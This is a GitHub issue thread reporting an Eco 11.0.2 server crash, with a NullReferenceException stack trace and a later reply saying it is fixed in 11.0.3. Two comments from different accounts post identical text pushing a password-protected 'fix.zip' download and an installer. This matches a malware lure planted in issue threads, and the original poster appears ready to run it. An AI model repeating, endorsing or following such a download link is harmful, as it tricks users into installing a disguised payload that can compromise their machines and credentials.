### ISSUE TITLE
Server crash while running /property unclaimabandoned

### ISSUE THREAD

**Issue by Maverick0581** [StrangeLoopGames/EcoIssues#25104]
Eco 11.0.2
SLG ID : c42e9f54-3dfc-4bd1-7cfe-08dc8d1bff58

As I was about to unclaim all abandoned deeds (with **/property unclaimabandoned**), my server crashed within the following seconds. Here is the error :

```
[15:58:16.057] [154] [Error] [Eco] System.AggregateException: One or more errors occurred. (Object reference not set to an instance of an object.)
 ---> System.NullReferenceException: Object reference not set to an instance of an object.
   at Eco.Gameplay.Settlements.SettlementInfluenceUtils.HasSatisfactoryCoverage(IEnumerable`1 influencePoints, LocString sourceName, LocString coverDesc, IAnnexable target, Single& percentCovered, IEnumerable`1 considerExtraPlots, IEnumerable`1 ignorePlots)
   at Eco.Gameplay.Settlements.SettlementInfluenceUtils.HasSatisfactoryCoverage(Settlement settlement, IAnnexable target, Single& percentCovered, IEnumerable`1 considerExtraPlots, IEnumerable`1 ignorePlots)
   at Eco.Gameplay.Settlements.Components.HomesteadFoundationComponent.<RecalcTowns>b__25_1(Settlement x)
   at System.Linq.Enumerable.WhereEnumerableIterator`1.ToList()
   at Eco.Gameplay.Settlements.Components.HomesteadFoundationComponent.RecalcTowns(Boolean notify)
   at Eco.Gameplay.Settlements.Components.HomesteadFoundationComponent.<Initialize>b__19_1()
   at Eco.Gameplay.InfluenceObjects.InfluenceChangeNotifier.MarkInfluenceChanged(IEnumerable`1 changedPlots)
   at Eco.Gameplay.Settlements.Internal.ChangeDetection.SettlementChangeDetector.DoUpdateNow()
   at Eco.Gameplay.Settlements.Internal.ChangeDetection.SettlementChangeDetector.Tick()
   at Eco.Gameplay.Settlements.SettlementManager.FastTick()
   at Eco.Gameplay.Civics.CivicsData.TickAll()
   at Eco.Core.Utils.Threading.PeriodicWorkerFactory.<>c__DisplayClass0_0.<Create>b__0(CancellationToken token)
   at Eco.Core.Utils.Threading.RepeatableWorkerBase.DoWork(CancellationToken token)
   --- End of inner exception stack trace --- System.NullReferenceException: Object reference not set to an instance of an object.
   at Eco.Gameplay.Settlements.SettlementInfluenceUtils.HasSatisfactoryCoverage(IEnumerable`1 influencePoints, LocString sourceName, LocString coverDesc, IAnnexable target, Single& percentCovered, IEnumerable`1 considerExtraPlots, IEnumerable`1 ignorePlots)
   at Eco.Gameplay.Settlements.SettlementInfluenceUtils.HasSatisfactoryCoverage(Settlement settlement, IAnnexable target, Single& percentCovered, IEnumerable`1 considerExtraPlots, IEnumerable`1 ignorePlots)
   at Eco.Gameplay.Settlements.Components.HomesteadFoundationComponent.<RecalcTowns>b__25_1(Settlement x)
   at System.Linq.Enumerable.WhereEnumerableIterator`1.ToList()
   at Eco.Gameplay.Settlements.Components.HomesteadFoundationComponent.RecalcTowns(Boolean notify)
   at Eco.Gameplay.Settlements.Components.HomesteadFoundationComponent.<Initialize>b__19_1()
   at Eco.Gameplay.InfluenceObjects.InfluenceChangeNotifier.MarkInfluenceChanged(IEnumerable`1 changedPlots)
   at Eco.Gameplay.Settlements.Internal.ChangeDetection.SettlementChangeDetector.DoUpdateNow()
   at Eco.Gameplay.Settlements.Internal.ChangeDetection.SettlementChangeDetector.Tick()
   at Eco.Gameplay.Settlements.SettlementManager.FastTick()
   at Eco.Gameplay.Civics.CivicsData.TickAll()
   at Eco.Core.Utils.Threading.PeriodicWorkerFactory.<>c__DisplayClass0_0.<Create>b__0(CancellationToken token)
   at Eco.Core.Utils.Threading.RepeatableWorkerBase.DoWork(CancellationToken token)
```

The exact command was **/property unclaimabandoned 5**
I can't reproduce the crash with a brand new save btw. I can give you my save if needed.

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Maverick0581** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

Thanks but I'm running the server on Debian, will it work ?

**Comment by D3nnis3n** [comment]
Fixed in 11.0.3.
